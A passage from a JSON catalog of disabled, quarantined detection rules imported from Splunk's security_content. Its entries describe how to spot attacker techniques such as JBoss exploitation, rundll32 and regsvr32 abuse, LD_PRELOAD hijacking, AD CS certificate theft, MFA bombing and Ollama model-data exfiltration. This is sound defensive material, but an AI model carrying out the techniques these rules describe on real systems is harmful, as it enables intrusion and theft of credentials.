"c8a6b56d-16dd-4e9c-b4bd-527742ead98d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/high_volume_of_bytes_out_to_url.yml" } }, { "id": "splunk-security-content-c8bff7a4-11ea-4416-a27d-c5bca472913d", "type": "detection", "name": "Detect malicious requests to exploit JBoss servers", "description": "The following analytic identifies malicious HTTP requests targeting the jmx-console in JBoss servers. It detects unusually long URLs, indicative of embedded payloads, by analyzing web server logs for GET or HEAD requests with specific URL patterns and lengths. This activity is significant as it may indicate an attempt to exploit JBoss vulnerabilities, potentially leading to unauthorized remote code execution. If confirmed malicious, attackers could gain control over the server, escalate privileges, and compromise sensitive data, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-malicious-requests-to-exploit-jboss-servers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8bff7a4-11ea-4416-a27d-c5bca472913d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_malicious_requests_to_exploit_jboss_servers.yml" } }, { "id": "splunk-security-content-c8c987d6-3a1a-4555-9a52-eea0741b6113", "type": "detection", "name": "HTTP Rapid POST with Mixed Status Codes", "description": "This detection identifies rapid-fire POST request attacks where an attacker sends more than 20 POST requests within a 5-second window, potentially attempting to exploit race conditions or overwhelm request handling. The pattern is particularly suspicious when responses vary in size or status codes, indicating successful exploitation attempts or probing for vulnerable endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190", "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-rapid-post-with-mixed-status-codes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8c987d6-3a1a-4555-9a52-eea0741b6113", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_rapid_post_with_mixed_status_codes.yml" } }, { "id": "splunk-security-content-c8e7ced0-10c5-11ec-8b03-acde48001122", "type": "detection", "name": "Rundll32 Control RunDLL Hunt", "description": "The following analytic identifies instances of rundll32.exe executing with `Control_RunDLL` in the command line, which is indicative of loading a .cpl or other file types. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as rundll32.exe can be exploited to execute malicious Control Panel Item files, potentially linked to CVE-2021-40444. If confirmed malicious, this could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-control-rundll-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8e7ced0-10c5-11ec-8b03-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_control_rundll_hunt.yml" } }, { "id": "splunk-security-content-c91a0852-9fbb-11ec-af44-acde48001122", "type": "detection", "name": "Unknown Process Using The Kerberos Protocol", "description": "The following analytic identifies a non-lsass.exe process making an outbound connection on port 88, which is typically used by the Kerberos authentication protocol. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs. This activity is significant because, under normal circumstances, only the lsass.exe process should interact with the Kerberos Distribution Center. If confirmed malicious, this behavior could indicate an adversary attempting to abuse the Kerberos protocol, potentially leading to unauthorized access or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unknown-process-using-the-kerberos-protocol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c91a0852-9fbb-11ec-af44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unknown_process_using_the_kerberos_protocol.yml" } }, { "id": "splunk-security-content-c9687a28-39ad-43c6-8bcf-eaf061ba0cbe", "type": "detection", "name": "Windows Privilege Escalation User Process Spawn System Process", "description": "The following analytic detects when a process with low, medium, or high integrity spawns a system integrity process from a user-controlled location.\nThis behavior is indicative of privilege escalation attempts where attackers elevate their privileges to SYSTEM level from a user-controlled process or service.\nThe detection leverages Sysmon data, specifically Event ID 15, to identify such transitions.\nMonitoring this activity is crucial as it can signify an attacker gaining SYSTEM-level access, potentially leading to full control over the affected system, unauthorized access to sensitive data, and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-user-process-spawn-system-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9687a28-39ad-43c6-8bcf-eaf061ba0cbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml" } }, { "id": "splunk-security-content-c97b3d72-0a47-46f9-b742-b89f1cc2d551", "type": "detection", "name": "O365 Email Send and Hard Delete Suspicious Behavior", "description": "The following analytic identifies when an O365 email account sends and then hard deletes email with within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to remove forensic artifacts or evidence of activity. Threat actors often use this technique to prevent defenders and victims from knowing the account has been compromised. --- Some account owner legitimate behaviors can trigger this alert, however these actions may not be aligned with organizational expectations / best practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001", "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-send-and-hard-delete-suspicious-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c97b3d72-0a47-46f9-b742-b89f1cc2d551", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_send_and_hard_delete_suspicious_behavior.yml" } }, { "id": "splunk-security-content-c9ef7dc4-eeaf-11eb-b2b6-acde48001122", "type": "detection", "name": "Regsvr32 with Known Silent Switch Cmdline", "description": "The following analytic detects the execution of Regsvr32.exe with the silent switch to load DLLs. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing the `-s` or `/s` switches. This activity is significant as it is commonly used in malware campaigns, such as IcedID, to stealthily load malicious DLLs. If confirmed malicious, this could allow an attacker to execute arbitrary code, download additional payloads, and potentially compromise the system further. Immediate investigation and endpoint isolation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/regsvr32-with-known-silent-switch-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9ef7dc4-eeaf-11eb-b2b6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/regsvr32_with_known_silent_switch_cmdline.yml" } }, { "id": "splunk-security-content-c9f010da-57ab-11ec-82bd-acde48001122", "type": "detection", "name": "Windows Raccine Scheduled Task Deletion", "description": "The following analytic identifies the deletion of the Raccine Rules Updater scheduled task using the `schtasks.exe` command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adversaries may delete this task to disable Raccine, a tool designed to prevent ransomware attacks. If confirmed malicious, this action could allow ransomware to execute without interference, leading to potential data encryption and loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raccine-scheduled-task-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9f010da-57ab-11ec-82bd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raccine_scheduled_task_deletion.yml" } }, { "id": "splunk-security-content-c9f4b923-f8af-4155-b697-1354f5bcbc5e", "type": "detection", "name": "Registry Keys Used For Privilege Escalation", "description": "The following analytic detects modifications to registry keys under \"Image File Execution Options\" that can be used for privilege escalation. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths and values like GlobalFlag and Debugger. This activity is significant because attackers can use these modifications to intercept executable calls and attach malicious binaries to legitimate system binaries. If confirmed malicious, this could allow attackers to execute arbitrary code with elevated privileges, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-used-for-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9f4b923-f8af-4155-b697-1354f5bcbc5e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_used_for_privilege_escalation.yml" } }, { "id": "splunk-security-content-c9fd1a54-0eab-4470-8970-d5fcc3c740fb", "type": "detection", "name": "Ollama Possible Model Exfiltration Data Leakage", "description": "Detects data leakage and exfiltration attempts targeting Ollama model metadata and configuration endpoints. Adversaries repeatedly query /api/show, /api/tags, and /api/v1/models to systematically extract sensitive model information including architecture details, fine-tuning parameters, system paths, Modelfile configurations, and proprietary customizations. Multiple inspection attempts within a 15-minute window indicate automated exfiltration of valuable intellectual property such as custom model configurations, system prompts, and internal model specifications. This activity represents unauthorized data disclosure that could enable competitive intelligence gathering, model replication, or preparation for advanced attacks against the AI infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-model-exfiltration-data-leakage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c9fd1a54-0eab-4470-8970-d5fcc3c740fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_model_exfiltration_data_leakage.yml" } }, { "id": "splunk-security-content-ca4e94fb-7969-4d63-8630-3625809a1f70", "type": "detection", "name": "Windows Modify Registry UpdateServiceUrlAlternate", "description": "The following analytic detects a suspicious modification to the Windows Update configuration registry key, specifically targeting the UpdateServiceUrlAlternate setting. It leverages data from the Endpoint.Registry datamodel to identify changes to this registry path. This activity is significant because adversaries, including malware like RedLine Stealer, exploit this technique to bypass detection and deploy additional payloads. If confirmed malicious, this modification could allow attackers to redirect update services, potentially leading to the execution of malicious code, further system compromise, and persistent evasion of security defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-updateserviceurlalternate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca4e94fb-7969-4d63-8630-3625809a1f70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml" } }, { "id": "splunk-security-content-ca5327e1-0a91-4e23-bbd4-8901806c00e1", "type": "detection", "name": "Windows Firewall Rule Deletion", "description": "This detection identifies instances where a Windows Firewall rule has been deleted, potentially exposing the system to security risks. Unauthorized removal of firewall rules can indicate an attacker attempting to bypass security controls or malware disabling protections for persistence and command-and-control communication. The event logs details such as the deleted rule name, protocol, port, and the user responsible for the action. Security teams should monitor for unexpected deletions, correlate with related events, and investigate anomalies to prevent unauthorized access and maintain network security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca5327e1-0a91-4e23-bbd4-8901806c00e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_deletion.yml" } }, { "id": "splunk-security-content-ca96297f-e82e-4749-8cc9-d1ab555abb57", "type": "detection", "name": "Ollama Possible Memory Exhaustion Resource Abuse", "description": "Detects abnormal memory allocation patterns and excessive runner operations in Ollama that may indicate resource exhaustion attacks, memory abuse through malicious model loading, or attempts to degrade system performance by overwhelming GPU/CPU resources. Adversaries may deliberately load multiple large models, trigger repeated model initialization cycles, or exploit memory allocation mechanisms to exhaust available system resources, causing denial of service conditions or degrading performance for legitimate users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-memory-exhaustion-resource-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca96297f-e82e-4749-8cc9-d1ab555abb57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_memory_exhaustion_resource_abuse.yml" } }, { "id": "splunk-security-content-cafa4bce-9f06-11ec-a7b2-acde48001122", "type": "detection", "name": "Windows Hide Notification Features Through Registry", "description": "The following analytic detects suspicious registry modifications aimed at hiding common Windows notification features on a compromised host. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant as it is often used by ransomware to obscure visual indicators, increasing the impact of the attack. If confirmed malicious, this could prevent users from noticing critical system alerts, thereby aiding the attacker in maintaining persistence and furthering their malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hide-notification-features-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cafa4bce-9f06-11ec-a7b2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hide_notification_features_through_registry.yml" } }, { "id": "splunk-security-content-cb38ee66-8ae5-47de-bd66-231c7bbc0b2c", "type": "detection", "name": "Windows Phishing Recent ISO Exec Registry", "description": "The following analytic detects the creation of registry artifacts when an ISO container is opened, clicked, or mounted on a Windows operating system. It leverages data from the Endpoint.Registry data model, specifically monitoring registry keys related to recent ISO or IMG file executions. This activity is significant as adversaries increasingly use container-based phishing campaigns to bypass macro-based document execution controls. If confirmed malicious, this behavior could indicate an initial access attempt, potentially leading to further exploitation, persistence, or data exfiltration within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-recent-iso-exec-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb38ee66-8ae5-47de-bd66-231c7bbc0b2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_recent_iso_exec_registry.yml" } }, { "id": "splunk-security-content-cb56a1ea-e0b1-46d5-913f-e024cba40cbe", "type": "detection", "name": "Windows Archived Collected Data In TEMP Folder", "description": "The following analytic detects the creation of archived files in a temporary folder, which may contain collected data. This behavior is often associated with malicious activity, where attackers compress sensitive information before exfiltration. The detection focuses on monitoring specific directories, such as temp folders, for the presence of newly created archive files (e.g., .zip, .rar, .tar). By identifying this pattern, security teams can quickly respond to potential data collection and exfiltration attempts, minimizing the risk of data breaches and improving overall threat detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archived-collected-data-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb56a1ea-e0b1-46d5-913f-e024cba40cbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archived_collected_data_in_temp_folder.yml" } }, { "id": "splunk-security-content-cb6af2b3-29ab-441c-8d8d-679811c8b014", "type": "detection", "name": "CrowdStrike Falcon Stream Alerts", "description": "The following analytic is to leverage alerts from CrowdStrike Falcon Event Stream. This query aggregates and summarizes DetectionSummaryEvent and IdpDetectionSummaryEvent alerts from CrowdStrike Falcon Event Stream, providing details such as destination, user, severity, MITRE information, and Crowdstrike id and links. The evals in the search do multiple things to include align the severity, ensure the user, dest, title, description, MITRE fields are set properly, and the drilldowns are defined based on the type of alert. The search is highly dynamic to account for different alert types in which some fields may or may not be populated. Having all these fields properly set ensure the appropriate risk and analyst queue fields are correctly populated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-falcon-stream-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb6af2b3-29ab-441c-8d8d-679811c8b014", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_falcon_stream_alerts.yml" } }, { "id": "splunk-security-content-cb6b339e-d4c6-11eb-a026-acde48001122", "type": "detection", "name": "Excessive Usage Of SC Service Utility", "description": "The following analytic detects excessive usage of the `sc.exe` service utility on a host machine. It leverages Sysmon EventCode 1 logs to identify instances where `sc.exe` is executed more frequently than normal within a 15-minute window. This behavior is significant as it is commonly associated with ransomware, cryptocurrency miners, and other malware attempting to create, modify, delete, or disable services, potentially related to security applications or for privilege escalation. If confirmed malicious, this activity could allow attackers to manipulate critical services, leading to system compromise or disruption of security defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-sc-service-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb6b339e-d4c6-11eb-a026-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_sc_service_utility.yml" } }, { "id": "splunk-security-content-cb909b3e-512b-11ec-aa31-3e22fbd008af", "type": "detection", "name": "Possible Lateral Movement PowerShell Spawn", "description": "The following analytic detects the spawning of a PowerShell process as a child or grandchild of commonly abused processes like services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names, as well as command-line executions.\nThis activity is significant as it could indicates lateral movement or remote code execution attempts by adversaries.\nIf confirmed malicious, this behavior could allow attackers to execute code remotely, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1021.006", "T1047", "T1053.005", "T1059.001", "T1218.014", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/possible-lateral-movement-powershell-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb909b3e-512b-11ec-aa31-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/possible_lateral_movement_powershell_spawn.yml" } }, { "id": "splunk-security-content-cbb3cb84-c06f-4393-adcc-5cb6195621f1", "type": "detection", "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic detects multiple failed multi-factor authentication (MFA) requests for a single user within a Google Cloud Platform (GCP) tenant. It triggers when 10 or more MFA prompts fail within a 5-minute window, using Google Workspace login failure events. This behavior is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. If confirmed malicious, this activity could lead to unauthorized access, allowing attackers to compromise accounts and potentially escalate privileges within the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbb3cb84-c06f-4393-adcc-5cb6195621f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-cbc95e44-7c22-443f-88fd-0424478f5589", "type": "detection", "name": "AWS ECR Container Scanning Findings Low Informational Unknown", "description": "The following analytic identifies low, informational, or unknown severity findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically the DescribeImageScanFindings event, to detect these findings. This activity is significant for a SOC as it helps in early identification of potential vulnerabilities or misconfigurations in container images, which could be exploited if left unaddressed. If confirmed malicious, these findings could lead to unauthorized access, data breaches, or further exploitation within the containerized environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-low-informational-unknown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbc95e44-7c22-443f-88fd-0424478f5589", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_low_informational_unknown.yml" } }, { "id": "splunk-security-content-cbe2ca30-631e-11ec-8670-acde48001122", "type": "detection", "name": "Linux Preload Hijack Library Calls", "description": "The following analytic detects the use of the LD_PRELOAD environment variable to hijack or hook library functions on a Linux platform. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because adversaries, malware authors, and red teamers commonly use this technique to gain elevated privileges and establish persistence on a compromised machine. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, and maintain long-term access to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-preload-hijack-library-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbe2ca30-631e-11ec-8670-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_preload_hijack_library_calls.yml" } }, { "id": "splunk-security-content-cbe761fc-d945-4c8c-a71d-e26d12255d32", "type": "detection", "name": "Windows Steal Authentication Certificates - ESC1 Abuse", "description": "The following analytic detects when a new certificate is requested or granted against Active Directory Certificate Services (AD CS) using a Subject Alternative Name (SAN). It leverages Windows Security Event Codes 4886 and 4887 to identify these actions. This activity is significant because improperly configured certificate templates can be exploited for privilege escalation and environment compromise. If confirmed malicious, an attacker could gain elevated privileges or persist within the environment, potentially leading to unauthorized access to sensitive information and further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-esc1-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbe761fc-d945-4c8c-a71d-e26d12255d32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates___esc1_abuse.yml" } }, { "id": "splunk-security-content-cbef820c-e1ff-407f-887f-0a9240a2d477", "type": "detection", "name": "Detect Path Interception By Creation Of program exe", "description": "The following analytic identifies the creation of a program executable in an unquoted service path, a common technique for privilege escalation. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the parent process is 'services.exe'. This activity is significant because unquoted service paths can be exploited by attackers to execute arbitrary code with elevated privileges. If confirmed malicious, this could allow an attacker to gain higher-level access, potentially leading to full system compromise and persistent control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 